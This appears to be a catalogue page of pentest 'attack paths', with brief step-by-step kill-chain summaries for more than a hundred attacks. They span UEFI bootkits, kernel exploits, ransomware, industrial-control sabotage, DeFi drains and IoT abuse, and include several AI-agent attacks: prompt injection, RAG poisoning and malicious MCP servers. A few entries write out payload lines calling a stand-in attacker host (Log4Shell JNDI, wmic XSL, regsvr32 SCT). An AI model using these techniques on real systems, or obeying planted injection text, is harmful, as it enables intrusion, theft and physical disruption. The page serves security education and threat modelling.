Attack paths
Community-reviewed graphs of pentest kill-chains, each stepping from initial access through to impact.
- Nº 0016 steps
LogoFAIL → UEFI bootkit → persistent ring-0
Drop a malformed JPG/PNG/BMP into the EFI partition's boot logo path. Vulnerable vendor UEFI parses it pre-OS, executes attacker code before SecureBoot's verifier — install a bootkit that survives wipe + reinstall.
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 0026 steps
Evil maid → sniff TPM unseal → decrypt BitLocker offline
Brief physical access to a TPM-only BitLocker laptop. Plug a logic analyser onto the LPC / SPI bus; capture the FVEK as the TPM unseals it at boot. Take the disk home, decrypt offline.
- CredAcc
- Disco
- Exfil
- IA
Filed by AD Knowledge Base - Nº 0036 steps
Subdomain takeover → ACME DNS-01 → trusted cert for victim host
Find a dangling CNAME / NS record. Claim the underlying resource; complete Let's Encrypt's DNS-01 challenge for the parent hostname. Now have a publicly-trusted cert for victim.example.com — chain into AITM.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0046 steps
Compromised root CA → arbitrary cert issuance → silent MITM
Compromise the private key (or signing process) of a publicly-trusted root or intermediate. Issue an unlogged cert for the target hostname; use it for invisible TLS MITM until CT-log monitoring or revocation catches up.
- CredAcc
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 0056 steps
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Coll
- Exec
- Impact
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0066 steps
Multi-agent confused-deputy → tool-call escalation
User-facing agent has limited tools; back-end planning agent has powerful tools (shell, file system). Prompt injection in user input → user agent → back-end agent. The back-end runs the attacker's intent under the planner's higher trust.
- Exec
- Exfil
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0075 steps
5G core GTP-U user-plane injection → subscriber MITM
Attacker on a transit network between mobile-core hops (or with compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0085 steps
IMSI catcher → force 2G downgrade → SMS / call intercept
Operate a rogue base station in the target area. Phones associate; force fallback to 2G where no mutual auth is required. Intercept SMS OTPs, sniff voice calls, push notifications fail silently.
- Coll
- CredAcc
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0095 steps
TRITON-class SIS reprogram → disable safety shutdown
After OT-network foothold, reach a Triconex Safety Instrumented System. Download attacker logic that suppresses safety trips on a process that's about to be pushed past its safe envelope.
- Impact
- Lat-Move
Filed by AD Knowledge Base - Nº 0106 steps
Industroyer2 IEC-104 substation hijack
Timed payload speaks IEC-60870-5-104 to substation RTUs at attacker-chosen hour; sends 'open breaker' commands across a substation, blackouts a grid section.
- Disco
- Exec
- Impact
- IA
Filed by AD Knowledge Base - Nº 0116 steps
Cloudflare account compromise → Worker rewrite → mass cred theft
Phish a Cloudflare account belonging to a popular site operator. Deploy a Worker that injects JS into every response — captures form posts (logins, payments) for the duration the operator doesn't notice.
- Coll
- Evade
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0126 steps
Origin IP bypass → direct attack on backend
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
- Coll
- Evade
- Exfil
- Recon
Filed by AD Knowledge Base - Nº 0135 steps
WAF SSRF → IMDS → S3 mass exfil (Capital One 2019)
A misconfigured ModSecurity rule on a customer-facing app allowed SSRF; SSRF hit EC2 IMDSv1 for the instance role; the role had ListBucket + GetObject on a major customer-data bucket.
- Coll
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0147 steps
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- Coll
- CredAcc
- IA
- Recon
Filed by AD Knowledge Base - Nº 0155 steps
Flash-loan veCRV → capture Curve gauge → emission redirect
Snapshot voting on Curve gauges uses veCRV balance at a specific block. Borrow large CRV via flash-loan, lock for max veCRV, vote in attacker pool's favour, unlock (or accept the limit) — emissions redirected for the epoch.
- Exfil
- Impact
- PrivEsc
Filed by AD Knowledge Base - Nº 0165 steps
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- Exfil
- Impact
- IA
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 0176 steps
io_uring UAF → modprobe_path overwrite → root
Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0187 steps
nf_tables UAF → kernel R/W → root
CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0195 steps
Renderer compromise → GPU process → vulnerable kernel driver
After renderer RCE, talk to the GPU process via IPC. GPU process sends ioctls to a vulnerable graphics driver — full kernel R/W; ring0 from a web page.
- Evade
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0207 steps
V8 type-confusion 1-day → renderer RCE
Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 0216 steps
SNMPv2c write-community → router config exfil → cred sprays
Find a router with 'private' RW community. Trigger SNMP-to-TFTP config download to attacker host. The config has RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user-pubkeys — spray harvested creds.
- Coll
- CredAcc
- Disco
- PrivEsc
Filed by AD Knowledge Base - Nº 0225 steps
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker AS; traffic for that prefix flows through attacker for inspection / DoS.
- CredAcc
- Lat-Move
- ResDev
Filed by AD Knowledge Base - Nº 0235 steps
Mifare Classic crack → cloned hotel key
Many hotel / corporate door systems still use Mifare Classic. Capture nonces during normal use, recover the Crypto-1 key with mfoc / mfcuk, write to a 'magic UID' card — full access to the property.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0246 steps
Apple Pay Express Transit relay → high-value contactless fraud
Specific configuration (Express Transit + Visa) allowed contactless transactions over £1k without unlock or per-tx auth. Two devices relayed the wallet from victim's pocket to a real terminal.
- Exfil
- Impact
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0256 steps
Mass SMS phish → Okta-style portal → SaaS sprawl (0ktapus)
Wide SMS phishing campaign targeting employees of ~130 organisations with a single phishlet that captures Okta credentials + push approval. Mass automated logins to Twilio, MailChimp, DoorDash et al.
- Exfil
- IA
- Recon
- ResDev
Filed by AD Knowledge Base - Nº 0266 steps
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- CredAcc
- Disco
- Exfil
- Impact
- Recon
- +1
Filed by AD Knowledge Base - Nº 0275 steps
Unauth DICOM PACS → mass medical-image exfil
PACS server accepts unauthenticated C-FIND / C-MOVE on port 104 / 11112. Query for every study, pull every image — exfil hundreds of thousands of patient scans + DICOM metadata (PII).
- Coll
- Disco
- Exfil
Filed by AD Knowledge Base - Nº 0285 steps
MITM HL7 v2 → tamper lab orders / results
HL7 v2 over MLLP is plaintext pipe-delimited. From the same VLAN as the lab analyser ↔ EHR link, MITM and rewrite OBX result segments — changes the patient's documented test result.
- CredAcc
- Impact
- IA
Filed by AD Knowledge Base - Nº 0296 steps
Process doppelgänging → spawn signed image with attacker bytes
Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- Evade
- Exec
- IA
Filed by AD Knowledge Base - Nº 0306 steps
Process hollowing → run beacon in svchost shell
Spawn svchost.exe suspended, unmap its image, write attacker PE into the same address space, resume — the process keeps a legit-looking PEB and command line but executes beacon code.
- C2
- Evade
- IA
Filed by AD Knowledge Base - Nº 0316 steps
AMSI patch → in-memory .NET / PowerShell stager
Patch AmsiScanBuffer in amsi.dll → return clean for any content. Subsequent PowerShell / Office VBA / .NET runtime calls emit attacker code without scanning.
- C2
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 0325 steps
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- CredAcc
- Evade
- Exec
- IA
Filed by AD Knowledge Base - Nº 0335 steps
Insider admin panel coercion → mass account takeover (Twitter 2020)
Identify employees with access to an internal admin panel. SE / coerce one to use the panel to change target accounts' email + 2FA, then take them over.
- CredAcc
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 0346 steps
Trusted updater hijack → wormable destructive payload (NotPetya / M.E.Doc)
Compromise a niche third-party vendor (regional tax software, niche industry tooling). Push a malicious update; every customer auto-installs it. Payload spreads via SMB + Mimikatz, wipes drives.
- Exec
- Impact
- IA
Filed by AD Knowledge Base - Nº 0356 steps
Leaked legacy VPN credential → ransomware (Colonial-class)
A dormant VPN account whose password appeared in a third-party breach is still active, has no MFA enforced. Sign in, recon AD, deploy ransomware across the estate.
- CredAcc
- Disco
- Impact
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0367 steps
Vish helpdesk → Okta MFA reset → admin → ransomware (MGM-class)
Identify an Okta admin via LinkedIn. Vish the helpdesk pretending to be that admin, get MFA reset. Sign in, plant attacker MFA factor, then push policy changes that disable MFA for chosen apps before mass-deploying ransomware.
- CredAcc
- Impact
- IA
- Persist
- PrivEsc
- +1
Filed by AD Knowledge Base - Nº 0377 steps
Build-system implant → signed supply-chain backdoor (SolarWinds-class)
Compromise the target vendor's build server. A small implant rewrites a single source file at compile time — every official signed release downstream now ships the backdoor.
- C2
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0385 steps
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0395 steps
ERC-4626 first-depositor inflation → drain new deposits
Be the first depositor with 1 wei → mint 1 share. Send tokens directly to the vault to inflate share price. Every subsequent depositor's amount, integer-divided by the inflated rate, rounds to zero shares.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0405 steps
Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- CredAcc
- Exec
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 0416 steps
MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)
Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- Exec
- Exfil
- Impact
- IA
- Persist
- +1
Filed by AD Knowledge Base - Nº 0426 steps
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- CredAcc
- Exec
- IA
- Recon
- ResDev
Filed by AD Knowledge Base - Nº 0436 steps
Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- CredAcc
- Exec
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0445 steps
MEV bot honeypot → drain searcher
Plant a transaction that looks like easy arbitrage in the public mempool. The MEV searcher bot front-runs into a trap contract whose 'profit' function reverts and seizes the searcher's gas + funds.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base - Nº 0454 steps
Uninitialised UUPS proxy implementation → brick contracts
UUPS upgradeable contracts must initialise the implementation contract itself. If skipped, anyone can call `initialise()` and become its owner — then call `selfdestruct` to brick every proxy referencing it (Parity Multisig 2017).
- Impact
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 0466 steps
z/OS TN3270 → RACF userID brute → mainframe shell
Internet-/intranet-exposed TN3270 mainframe terminal. Userids follow predictable HR scheme. Brute-force passwords; many environments allow short / dictionary passwords for legacy reasons.
- CredAcc
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 0475 steps
LoRaWAN replay → spoof environmental sensor
Capture LoRaWAN uplinks from a target sensor. Devices that reset FCnt on reboot accept replayed frames — feed false readings into the upstream IoT platform.
- CredAcc
- Disco
- Impact
Filed by AD Knowledge Base - Nº 0485 steps
BACnet HVAC → disrupt building operations
BACnet on UDP/47808 is unauthenticated. From a foothold in corporate IT, write to HVAC controllers — over-cool a data centre, disable smoke evacuation, mess with elevators.
- CredAcc
- Disco
- Impact
Filed by AD Knowledge Base - Nº 0496 steps
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Coll
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0505 steps
SAML signature wrapping (XSW) → impersonate admin
Capture a legitimate SAML response. Re-arrange the XML so the IdP's signature still validates against the original assertion, but the SP parses an attacker-injected assertion claiming Admin.
- CredAcc
- Exfil
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base - Nº 0514 steps
wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- Exec
- Persist
- ResDev
Filed by AD Knowledge Base - Nº 0525 steps
Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- Exec
- IA
- Persist
- ResDev
Filed by AD Knowledge Base - Nº 0536 steps
certutil + bitsadmin → AV-friendly stager chain
Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.
- C2
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 0546 steps
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- CredAcc
- Exec
- IA
- Recon
Filed by AD Knowledge Base - Nº 0555 steps
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- CredAcc
- Disco
- Exec
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0566 steps
ESXiArgs — OpenSLP unauth RCE → ransomware
Internet-facing ESXi with SLP service on TCP/427 unpatched for CVE-2021-21974. Single ROP gadget chain yields root, then a small bash script encrypts every .vmdk on local datastores.
- Exec
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0576 steps
OneNote .one attachment → embedded payload → C2
OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- C2
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 0586 steps
ISO container → LNK → stage from CDN → C2
Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.
- C2
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 0595 steps
Hardware wallet supply-chain tamper → pre-seeded seed
Intercept Trezor / Ledger / KeepKey in transit (or counterfeit on Amazon / eBay). Replace device with one that already has a known seed phrase the attacker controls — victim deposits, attacker drains.
- Exfil
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0606 steps
Wallet drainer dApp → setApprovalForAll → instant theft
Victim connects their wallet to a phishing dApp (fake mint / fake airdrop). One click on 'Confirm' calls setApprovalForAll on every valuable NFT collection — drained moments later.
- Exec
- Exfil
- Impact
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0616 steps
SSRF → reach internal Redis → write SSH key → RCE
Web app SSRF lets the attacker hit gopher://redis on the internal network. Inject CONFIG SET dir + dbfilename + SAVE to write an SSH authorized_keys onto the Redis host — log in as the Redis user.
- Exec
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0625 steps
Open MongoDB → dump every collection
Shodan-indexed MongoDB on 27017 with no auth. Connect, list databases, dump every collection. Often the second stage is a ransom note in a new 'README' collection.
- Disco
- Exfil
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0636 steps
vCenter pre-auth RCE → root on every ESXi → mass encrypt
Pre-auth RCE on vCenter Server (DCERPC or vSphere Client class CVE). Deploy SSH key via vCenter to every managed ESXi, then mass-encrypt every .vmdk — the ESXiArgs / Black Basta playbook.
- CredAcc
- Disco
- Impact
- IA
- Persist
Filed by AD Knowledge Base - Nº 0646 steps
FortiGate SSL-VPN pre-auth RCE → config theft
Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
- Coll
- CredAcc
- Exec
- IA
- Recon
Filed by AD Knowledge Base - Nº 0656 steps
Ivanti Pulse Connect Secure → pre-auth RCE → corporate VPN takeover
Two-stage chain (auth bypass + command injection) lands root on the Pulse appliance. Exfil VPN configs, pivot through the tunnel into the corporate network.
- Coll
- IA
- Lat-Move
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0666 steps
Citrix Bleed → steal authenticated session → MFA bypass
Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.
- CredAcc
- Disco
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 0676 steps
Unpatched Confluence (CVE-2023-22515) → internal foothold
Internal Confluence instance reachable from the corporate VLAN. Trivial privilege-escalation CVE creates an admin user; webshell uploaded; pivot into AD service accounts.
- CredAcc
- Disco
- IA
- Lat-Move
- Persist
- +1
Filed by AD Knowledge Base - Nº 0686 steps
Slack token in CI log → DM history → vendor mailbox compromise
A CI run echoed a Slack xoxb-/xoxp- token. Use it to read DMs, harvest password-reset links and vendor invitations, pivot into the corporate mailbox.
- Coll
- CredAcc
- Disco
- IA
- Recon
Filed by AD Knowledge Base - Nº 0696 steps
Leaked GitHub PAT → org takeover → supply-chain push
A maintainer's PAT lands in a public Gist (or a Docker image layer). The token has repo + workflow scopes — push a malicious commit to a popular package, fire the auto-publish workflow.
- CredAcc
- Disco
- Exec
- IA
- Recon
Filed by AD Knowledge Base - Nº 0705 steps
DNS tunnel exfiltration in restricted egress
Outbound web is filtered, but DNS still resolves to the corporate forwarder. Use iodine / dnscat2 to tunnel a shell + exfil over DNS queries to an attacker-controlled authoritative server.
- C2
- Disco
- Exfil
- IA
Filed by AD Knowledge Base - Nº 0716 steps
AXFR → discover shadow-IT staging → exploitable web app
DNS server allows unrestricted AXFR. Pull the full zone, find admin- / staging- / dev- hostnames never linked, hit one with default creds / leftover debug routes.
- Disco
- Exfil
- Recon
Filed by AD Knowledge Base - Nº 0726 steps
DNS rebinding → access internal router admin from a browser
Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.
- CredAcc
- IA
- Lat-Move
- ResDev
Filed by AD Knowledge Base - Nº 0736 steps
Header smuggling → gateway sees vendor, mailbox sees attacker
Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.
- Evade
- Exec
- IA
- Recon
Filed by AD Knowledge Base - Nº 0746 steps
Spectre-class side-channel → cross-tenant memory leak
Pre-mitigation cloud VM lets a co-tenant trigger speculative loads from kernel / sibling-VM memory. Cache-side-channel measurements recover sensitive data, including TLS keys + cloud creds.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 0756 steps
Rowhammer → bit flip → in-browser sandbox escape
JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 0766 steps
PJL / PostScript → printer root → quiet network foothold
PRET-style payloads against TCP/9100 give RCE on the printer's controller. The printer is a stable, EDR-free Linux box trusted by the rest of the network — perfect long-term implant.
- Coll
- CredAcc
- Disco
- Exec
Filed by AD Knowledge Base - Nº 0777 steps
Reconfigure MFP LDAP → harvest service-account credentials
Walk up to / network-into the MFP admin web panel (default creds), change the LDAP address-book server to attacker IP — printer immediately re-binds and sends its service-account creds in cleartext.
- CredAcc
- Disco
- IA
- Lat-Move
- ResDev
Filed by AD Knowledge Base - Nº 0784 steps
EMV → Magstripe downgrade → card cloning
Many terminals still accept magstripe fallback when EMV chip 'fails'. Block / corrupt the chip read; terminal accepts cloned magstripe data captured earlier from a shimmer or skimmer.
- Coll
- Evade
- Exfil
Filed by AD Knowledge Base - Nº 0797 steps
Permissive SPF / DMARC p=none → CEO impersonation BEC
Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.
- Impact
- IA
- Recon
- ResDev
Filed by AD Knowledge Base - Nº 0807 steps
POS network pivot → RAM-scraper → card data exfil
The Target 2013 / Home Depot 2014 chain: vendor foothold → flat payment-switch VLAN → drop a memory-scraping malware on POS terminals → exfil track data through a payment-switch host.
- Coll
- Exfil
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0816 steps
Compromised vendor mailbox → reply-chain phishing → client compromise
Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- Coll
- Exec
- IA
Filed by AD Knowledge Base - Nº 0826 steps
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- Coll
- CredAcc
- Exec
- IA
- ResDev
Filed by AD Knowledge Base - Nº 0835 steps
HMI default credentials → operations disruption
Wonderware / iFix HMI exposed to the corporate network with vendor-default credentials. Operators see attacker-controlled values + commands sent to PLCs through legit channels.
- Disco
- Impact
- IA
Filed by AD Knowledge Base - Nº 0845 steps
Compromised extension auto-update → fleet compromise
Take over a popular extension's developer account (credential stuffing on the store, abandoned email domain). Push a malicious version — every existing install runs attacker code on next launch.
- CredAcc
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 0856 steps
Padding oracle → forge admin session cookie
App encrypts session cookies with AES-CBC and reveals padding-validity via a 500/200 differential. Decrypt the cookie, forge an admin cookie, log in without credentials.
- CredAcc
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 0866 steps
Predictable RNG → forge password-reset tokens
App generates reset tokens via Math.random / Mersenne Twister seeded with time(). Capture a few legit tokens, recover the internal state, predict the next token for any user.
- CredAcc
- IA
- Persist
Filed by AD Knowledge Base - Nº 0876 steps
Flash loan + oracle manipulation → drain DEX
DeFi contract reads spot price from a single pool. Borrow a flash loan, distort the pool, exploit the dependent contract while price is wrong, repay the loan in the same transaction.
- Exfil
- Impact
- Recon
Filed by AD Knowledge Base - Nº 0886 steps
Reentrancy → drain vault contract
Vulnerable withdraw() sends ETH before updating balance. Attacker contract re-enters via fallback() until the vault is empty — the canonical DAO-2016 pattern.
- Exfil
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0895 steps
Reachable Modbus PLC → direct register override
Modbus has no authentication. From a foothold on a reachable OT network, write to coils / holding registers directly with pymodbus.
- CredAcc
- Disco
- Impact
Filed by AD Knowledge Base - Nº 0906 steps
Engineering workstation → push payload to PLC
Compromise the OT engineer's laptop (corporate-network adjacent, jumphost-reachable). Use legit engineering tools (TIA Portal / Studio 5000) to download attacker ladder logic to the PLC.
- Impact
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 0915 steps
Zigbee network key sniff → smart-home control
Sniff a fresh device-join with an Atmel RZRAVEN — Zigbee broadcasts the network key in plaintext during pairing. Decrypt all subsequent traffic + send commands.
- CredAcc
- Impact
Filed by AD Knowledge Base - Nº 0926 steps
Exposed UART → root shell → firmware extraction
Open the IoT device, locate TX/RX/GND pads, attach a USB-UART, get an unauthenticated root prompt, dump firmware for offline analysis + 0-day hunting.
- Coll
- Disco
- Exec
- IA
Filed by AD Knowledge Base - Nº 0935 steps
Open MQTT broker → smart-estate takeover
Shodan-indexed MQTT broker on TCP/1883 with no auth. Subscribe to '#' to harvest every device topic; publish to relays/locks/lights/thermostats.
- Disco
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0945 steps
BLE eavesdrop + replay → smart lock open
Smart lock uses BLE Just-Works pairing + plaintext 'unlock' opcode. Sniff once with a nRF52 in monitor mode, replay later from a $10 device.
- CredAcc
- Disco
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 0956 steps
Flash-loan governance attack → DAO admin
Voting power = token balance at snapshot. Borrow enormous quantity via flash loan inside the snapshot tx, vote yourself in as admin, repay loan.
- Exfil
- Impact
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 0966 steps
Cross-chain bridge validator-set bypass → mint wrapped tokens
Bridge's signature-set check is off-by-one (Nomad-class) or accepts a zero address (Ronin-class). Mint wrapped tokens on the destination chain without locking on the source.
- Evade
- Exfil
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 0974 steps
Signature replay across chains → token drain
EIP-2612 permit() signed without chainId / domain separator binding. Capture the off-chain signature on one chain and replay it on another to drain ERC-20 approvals.
- CredAcc
- Exfil
- Recon
Filed by AD Knowledge Base - Nº 0985 steps
SIP extension brute → toll fraud / premium-rate exfil
Internet-exposed Asterisk / FreePBX with extensions whose password equals the extension number. Bruteforce a few, place expensive international / premium-rate calls.
- CredAcc
- Disco
- Impact
- IA
Filed by AD Knowledge Base - Nº 0995 steps
MITM unencrypted RTP → call eavesdropping
Most internal SIP deployments still use RTP without SRTP. From the same VLAN, ARP-spoof the IP phone + PBX, capture RTP, decode in Wireshark to .wav.
- Coll
- CredAcc
- Exfil
- IA
Filed by AD Knowledge Base - Nº 1005 steps
Gatekeeper bypass → unsigned binary execution
Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.
- Evade
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 1016 steps
Root detection + SSL pinning bypass → MITM the API
Rooted test device with Frida. Hook the app's root-detection and OkHttp CertificatePinner; route traffic through Burp to expose the entire authenticated API surface.
- CredAcc
- Evade
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1026 steps
Deeplink abuse → in-app account takeover
Exported activity registers a custom URL scheme that triggers an OAuth-style 'confirm reset' action without validating the source — phishing URL clicks reset another user's password.
- IA
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1036 steps
Exported ContentProvider → private data leak
App exports a ContentProvider for legitimate inter-app integration but forgets to enforce grantUri / signature permissions — a rogue installed app reads private auth tokens.
- Coll
- CredAcc
- Disco
- Exfil
- IA
- +1
Filed by AD Knowledge Base - Nº 1045 steps
WebView XSS → JS bridge → native code exec
WebView loads partially-attacker-controlled content (e.g. injected referral param) and exposes addJavascriptInterface — XSS in the page calls the bridge to run app-level code.
- Exec
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 1055 steps
Open ADB on the network → device shell
An IoT / dev device left adbd listening on TCP/5555 — anyone on the LAN runs `adb connect` and gets a shell as the shell user, including pulling user data.
- Coll
- CredAcc
- Disco
- IA
Filed by AD Knowledge Base - Nº 1065 steps
Jailbreak detection bypass → keychain dump
Test on a jailbroken device. Hook jailbreak-detection routines, run objection to dump the entire app keychain — recovers session tokens, refresh tokens, biometric keys.
- CredAcc
- Evade
- Exec
- IA
Filed by AD Knowledge Base - Nº 1076 steps
iOS URL scheme hijack → OAuth code theft
Multiple apps register the same custom URL scheme — a rogue app installed alongside the target receives the OAuth callback containing the authorisation code, then exchanges it for tokens.
- CredAcc
- Exec
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 1085 steps
Direct prompt injection → exfil another user's data
Multi-tenant LLM assistant. Attacker's prompt overrides instructions and tricks the model into emitting another user's session content / RAG-cached data.
- Coll
- Disco
- Impact
- IA
Filed by AD Knowledge Base - Nº 1095 steps
Indirect prompt injection via RAG document
Attacker uploads a poisoned document to a customer wiki / SharePoint that the LLM ingests at query time. Injection fires when a privileged user later asks a question that retrieves the doc.
- Exec
- Exfil
- IA
- Persist
Filed by AD Knowledge Base - Nº 1105 steps
Agent goal hijack via web search
An autonomous agent searches the web and reads tool output. Attacker SEO-poisons / posts a comment that, when fetched, contains 'NEW INSTRUCTION:' the agent obediently follows.
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1115 steps
Output injection → admin XSS in support panel
